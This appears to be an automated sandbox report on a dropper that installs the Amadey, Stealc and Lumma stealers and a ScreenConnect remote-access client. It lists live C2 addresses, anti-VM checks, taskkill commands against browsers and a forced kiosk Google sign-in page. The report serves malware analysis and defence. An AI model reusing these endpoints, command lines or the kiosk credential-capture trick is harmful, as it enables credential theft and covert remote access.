Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/11/2024, 22:25

General

  • Target

    d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe

  • Size

    6.0MB

  • MD5

    d7a40118e6d4686b4a11f4ac49ccaf1d

  • SHA1

    d80be69c93759cfd2bb9dec276979e196202aab1

  • SHA256

    d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c

  • SHA512

    a1126fe60f9891131ac9de04f3b1512e7da0197c168c9d1d3d4632ad52eaf002467220bd5b423d3a21212b558daa444cc4cb40a806cf3f06bf0a7b1b6a5137a3

  • SSDEEP

    98304:7Gb+KW8pO2DH2OP/yErov5MtEkVxXaFwpyAnSWxuv38/oPOYPnAAya0wjSQ/gaY6:7hKW8pRNyUov5Mt9xKFwpBfwrG4z

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

tale

C2

http://185.215.113.206

Attributes
  • url_path

    /6c4adf523b719729.php

Extracted

Family

lumma

C2

https://founpiuer.store/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 15 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 22 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 38 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe
    "C:\Users\Admin\AppData\Local\Temp\d4d6aaa232271d8e81d2a03d503a73f46a5c5c710fa6128c08284874a6c8ff0c.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4040
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\k3a89.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1364
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\l3v78.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3512
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1K20A9.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe
              "C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
              • C:\Windows\SysWOW64\msiexec.exe
                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\d24c72d59e97003e\ScreenConnect.ClientSetup.msi"
                7⤵
                • Enumerates connected drives
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:3448
            • C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe
              "C:\Users\Admin\AppData\Local\Temp\1004459001\155aa5ef5f.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6068
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 1580
                7⤵
                • Program crash
                PID:6516
            • C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe
              "C:\Users\Admin\AppData\Local\Temp\1004460001\1efbfbe0a1.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6652
            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
              "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
              6⤵
                PID:4872
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2z8437.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2228
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1596
              5⤵
              • Program crash
              PID:3000
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1560
              5⤵
              • Program crash
              PID:824
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3s79Z.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1280
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T753l.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:5000
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4068
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1476
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4536
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          3⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:776
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:512
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            4⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1524
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b77de24-d33a-40c2-82ec-917f74c4324b} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" gpu
              5⤵
                PID:2004
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2488 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {be0f1a05-b263-450d-8841-67ceef0269e4} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" socket
                5⤵
                  PID:4904
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3260 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb641dc6-a8ec-4210-ba20-2e48fa232a83} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                  5⤵
                    PID:2524
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4032 -childID 2 -isForBrowser -prefsHandle 3992 -prefMapHandle 4024 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a44a9c27-ebca-4945-9e46-4bbe5895bd33} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                    5⤵
                      PID:3768
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4664 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4648 -prefMapHandle 4644 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b71c063d-503d-4d6f-9dc5-b8f94127b5ff} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" utility
                      5⤵
                      • Checks processor information in registry
                      PID:4324
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5356 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82748f5c-d07b-4945-8a2b-bc94a7c56175} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                      5⤵
                        PID:5544
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 4 -isForBrowser -prefsHandle 5588 -prefMapHandle 5584 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45596daf-3f2c-48c8-acd8-6ea8f58bd382} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                        5⤵
                          PID:5556
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 5 -isForBrowser -prefsHandle 5780 -prefMapHandle 5776 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1148 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd6d0937-0f0b-42ef-93bc-df27b18c8233} 1524 "\\.\pipe\gecko-crash-server-pipe.1524" tab
                          5⤵
                            PID:5600
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2228 -ip 2228
                    1⤵
                      PID:3868
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2228 -ip 2228
                      1⤵
                        PID:3624
                      • C:\Windows\system32\msiexec.exe
                        C:\Windows\system32\msiexec.exe /V
                        1⤵
                        • Enumerates connected drives
                        • Boot or Logon Autostart Execution: Authentication Package
                        • Drops file in Program Files directory
                        • Drops file in Windows directory
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4068
                        • C:\Windows\syswow64\MsiExec.exe
                          C:\Windows\syswow64\MsiExec.exe -Embedding 501C38EF6B291425D6859961753099A0 C
                          2⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:4592
                          • C:\Windows\SysWOW64\rundll32.exe
                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI3246.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240661921 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            3⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:7152
                        • C:\Windows\system32\srtasks.exe
                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                          2⤵
                            PID:624
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding 7CFBEE859CA79996410C342D7BC32AF0
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:1664
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding 414DA11BFEF912AFF013CA3881CCDF84 E Global\MSI0000
                            2⤵
                            • Loads dropped DLL
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:5232
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                          • Checks SCSI registry key(s)
                          PID:5856
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6068 -ip 6068
                          1⤵
                            PID:6484
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6068 -ip 6068
                            1⤵
                              PID:3304
                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe
                              "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-jo8t3z-relay.screenconnect.com&p=443&s=a79bfa06-e94f-44e4-9b80-51e71f3cd8f7&k=BgIAAACkAABSU0ExAAgAAAEAAQBlgoG8SEwJuyUMAVbS1u9ET8b79k7P%2f7J4ow1fhC2ZualDFO3ArdOiWpDAdhopcBg1REuXbjohRxTcgfk%2fkWJ0WT0qz5dal4OA949TlU4xXVZgsV0RQ27tunoj2Q3J7A0ZtL3jq76NFZjZmVG7GZ8TBeTo5Y06XH33FmoVf9VwzHvTmfCw68ESdxodX61R68SwDT%2feGQQsd4M4MsJXToPLVYZqtW1TRq5D4ltSurcvRmEJarN0C6Zv%2fcAzkHuYmbZkQ9ewAJ6tbcDfe8cR98K4%2f5CyE7xxC2Ljkso4d5K3C2QDFOLofUwV0kLgDGg60cdSrGBhJhxOkipcAOnC%2fXDH&c=zhark&c=&c=&c=&c=&c=&c=&c="
                              1⤵
                              • Sets service image path in registry
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:552
                              • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe
                                "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe" "RunRole" "f83338c0-7281-4d35-abce-1ff54289d06a" "User"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:5624
                              • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe
                                "C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe" "RunRole" "b774de6c-ea05-480c-b37d-f7e18ad61075" "System"
                                2⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                • Checks processor information in registry
                                • Modifies data under HKEY_USERS
                                PID:6168
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2708
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:6528

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Config.Msi\e586b68.rbs

                              Filesize

                              214KB

                              MD5

                              6f52a4e795288f86d4cfdd10d0aece50

                              SHA1

                              404b411fdab05b8fae792a765c24626e28ef1803

                              SHA256

                              c5dbc66a0300d6972e59c4093d4e97ae3eba82f32b426e1ced725da77cc7f581

                              SHA512

                              95e1662e7d0e35d8b4418d077a607ad69aba056fc63ae81db2dc70a25aed636cb5f3605a3bd79cae70d2e25939e345db024cac31591e153b2b8b1e8dc1fc507b

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\Client.de-DE.resources

                              Filesize

                              45KB

                              MD5

                              1503a8721469dcd677e64de935c7c320

                              SHA1

                              c618d6a9a4c01d8b88b323b4ca776838258de88d

                              SHA256

                              9194a594d9d79773e10d5ee9a2d685914d7e02935b3c676b40a1fa97135a67d7

                              SHA512

                              68e22b682c0b507107c9709b93bded22440f01f5820c0a50c85885c2cd56298c37ccda83f78a43ff3098926349b7ef479c5087a628b3579985ef4e759dd26109

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\Client.en-US.resources

                              Filesize

                              48KB

                              MD5

                              d524e8e6fd04b097f0401b2b668db303

                              SHA1

                              9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

                              SHA256

                              07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

                              SHA512

                              e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\Client.resources

                              Filesize

                              26KB

                              MD5

                              5cd580b22da0c33ec6730b10a6c74932

                              SHA1

                              0b6bded7936178d80841b289769c6ff0c8eead2d

                              SHA256

                              de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

                              SHA512

                              c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.Client.dll

                              Filesize

                              192KB

                              MD5

                              3724f06f3422f4e42b41e23acb39b152

                              SHA1

                              1220987627782d3c3397d4abf01ac3777999e01c

                              SHA256

                              ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f

                              SHA512

                              509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.dll

                              Filesize

                              66KB

                              MD5

                              5db908c12d6e768081bced0e165e36f8

                              SHA1

                              f2d3160f15cfd0989091249a61132a369e44dea4

                              SHA256

                              fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca

                              SHA512

                              8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.ClientService.exe

                              Filesize

                              93KB

                              MD5

                              75b21d04c69128a7230a0998086b61aa

                              SHA1

                              244bd68a722cfe41d1f515f5e40c3742be2b3d1d

                              SHA256

                              f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e

                              SHA512

                              8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsAuthenticationPackage.dll

                              Filesize

                              254KB

                              MD5

                              5adcb5ae1a1690be69fd22bdf3c2db60

                              SHA1

                              09a802b06a4387b0f13bf2cda84f53ca5bdc3785

                              SHA256

                              a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

                              SHA512

                              812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe

                              Filesize

                              588KB

                              MD5

                              1778204a8c3bc2b8e5e4194edbaf7135

                              SHA1

                              0203b65e92d2d1200dd695fe4c334955befbddd3

                              SHA256

                              600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31

                              SHA512

                              a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsClient.exe.config

                              Filesize

                              266B

                              MD5

                              728175e20ffbceb46760bb5e1112f38b

                              SHA1

                              2421add1f3c9c5ed9c80b339881d08ab10b340e3

                              SHA256

                              87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

                              SHA512

                              fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\ScreenConnect.WindowsCredentialProvider.dll

                              Filesize

                              822KB

                              MD5

                              be74ab7a848a2450a06de33d3026f59e

                              SHA1

                              21568dcb44df019f9faf049d6676a829323c601e

                              SHA256

                              7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

                              SHA512

                              2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

                            • C:\Program Files (x86)\ScreenConnect Client (d24c72d59e97003e)\system.config

                              Filesize

                              956B

                              MD5

                              0cefe6f3e57d990f14a9ab39948c7537

                              SHA1

                              7653e4ea304d876363c75a4be64159bfd478df48

                              SHA256

                              0a08f8a37031033c611d66c860630e168c254fe34a3478cabc8a0a73136e010d

                              SHA512

                              c6f2e9fd2de23c7573b62315130d3f3bfee172a65915bc8f175c06f9697fa216accc5db3924eb3b6288a993a723c2f00fcea97a237d12fc2b1151a2867a152a4

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json

                              Filesize

                              19KB

                              MD5

                              3151802e834cd134b9feda77ff089152

                              SHA1

                              be47e316f831c18e6748848a69a009bf3b189af1

                              SHA256

                              7770fe9b84b360b272df55d1ea5b70c8fbcdd7ceb7f9604849f683bfaa930485

                              SHA512

                              024413a0036d064464c825b14acc2e282336e480059867a11e859c5452814fdb50efec79f907fc62d127361cdf705722a65c6aa435695a0b3bacbefe0dba32c7

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\D500AD994A7515157BB2A6ADD5B18B754E4D2F99

                              Filesize

                              13KB

                              MD5

                              f53f83a08302d1704bbf413cdb0bdfda

                              SHA1

                              6fd3337a35819dd29e97b15837c9f0229cf7b072

                              SHA256

                              176c1da7d1504a4f58e914caf183551f50cdf7180876bb0949ea48b26fb13851

                              SHA512

                              12ec0348b9c2d71ebf9808783f27bca1a0b4234b31a7c6e89e421d37e197ef729cf4cea629fa46530fdb88e6671372f8f55e4985aa74e1665e61fa6798048f3b

                            • C:\Users\Admin\AppData\Local\Temp\1004454001\zhark.exe

                              Filesize

                              5.4MB

                              MD5

                              df88b916e638a22e49eeef86a90a0a6f

                              SHA1

                              6fca6e20fefd301d869e3f43162eb461ad007e36

                              SHA256

                              120c4ebc2cc5028cbd1d9a65f4fbd88c0e7f809d5d3bb9304a0ef07585cc3a27

                              SHA512

